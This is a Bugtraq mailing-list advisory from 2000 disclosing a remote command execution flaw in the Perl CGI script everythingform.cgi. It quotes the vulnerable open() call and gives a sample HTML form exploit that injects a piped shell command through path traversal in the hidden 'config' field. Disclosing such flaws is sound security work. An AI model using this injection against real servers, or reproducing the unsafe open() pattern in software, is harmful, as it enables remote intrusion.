Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Insecure input validation in everythingform.cgi (remote command execution)

From: rpc <h () ckz org>
Date: Mon, 11 Dec 2000 14:16:03 GMT
Hi All,

This is Yet Another Bad Perl Script.  everythingform.cgi uses a hidden field
'config' to determine where to read configuration data from.

--code snippit--
..
$ConfigFile = $in{config};
..
 open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in
the ReadConfig subroutine. Reason: $!");
------------

Information regarding everythingform can be found at:
 http://www.conservatives.net/atheist/scripts/index.html?everythingform

Sample exploit:

<form action="http://www.conservatives.net/someplace/everythingform.cgi";
method=POST>
<h1>everythingform.cgi exploit</h1>
Command: <input type=text name=config value="../../../../../../../../bin/ping
-c 5 www.foobar.com|">
<input type=hidden name=Name value="fuck the religious right">
<input type=hidden name="e-mail" value="foo () bar net">
<input type=hidden name=FavoriteColor value=Black>
<input type=submit value=run>
</form>


--rpc
Previous By Date Next
Previous By Thread Next

Current thread: